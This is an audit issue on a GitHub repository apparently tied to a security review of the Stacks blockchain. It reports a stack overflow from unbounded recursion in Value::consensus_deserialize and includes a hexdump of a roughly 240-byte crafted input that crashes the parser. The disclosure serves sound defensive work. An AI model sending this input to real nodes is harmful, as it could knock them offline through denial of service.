search

diwakergupta / stacks-blockchain-tob-audit

GNU General Public License v3.0
0 stars 0 forks source link

Stack overflow in `Value::consensus_deserialize` #8

Open smoelius opened 4 years ago

smoelius commented 4 years ago

Value::consensus_deserialize calls Value::deserialize_read, and Value::deserialize_read calls itself here: https://github.com/trailofbits/x-audit-blockstack-core/blob/e2d3d5bae539d242851620e28129af6c4a9de642/src/vm/types/serialization.rs#L285 However, only one bytes has been consumed from the input when the recursive call is made. On the Linux box on which I am performing these experiments, about 240 calls are sufficient to overflow the stack. Thus, ~240 byte input is sufficient to overflow the stack. The following is an example:

00000000: 0808 0808 0808 0808 0808 0707 0708 0807  ................
00000010: 0808 0808 0808 0807 0808 0808 0807 0808  ................
00000020: 0707 0807 0708 0807 0808 0808 0808 0807  ................
00000030: 0808 0808 0807 0808 0707 0807 0807 0807  ................
00000040: 0808 0808 0808 0807 0808 0808 0807 0808  ................
00000050: 0708 0808 0808 0808 0808 0707 0807 0808  ................
00000060: 0808 0808 0708 0807 0707 0808 0707 0808  ................
00000070: 0708 0808 0808 0708 0807 0708 0708 0708  ................
00000080: 0808 0808 0808 0707 0807 0807 0807 0807  ................
00000090: 0808 0808 0808 0807 0808 0808 0807 0808  ................
000000a0: 0708 0808 0808 0808 0808 0707 0807 0808  ................
000000b0: 0808 0808 0708 0807 0707 0808 0707 0808  ................
000000c0: 0708 0808 0808 0708 0807 0708 0708 0708  ................
000000d0: 0808 0808 0808 0707 0807 0808 0808 0808  ................
000000e0: 0708 0807 0707 0808 0707 0808 0807 0808  ................
000000f0: 0707 0708                                ....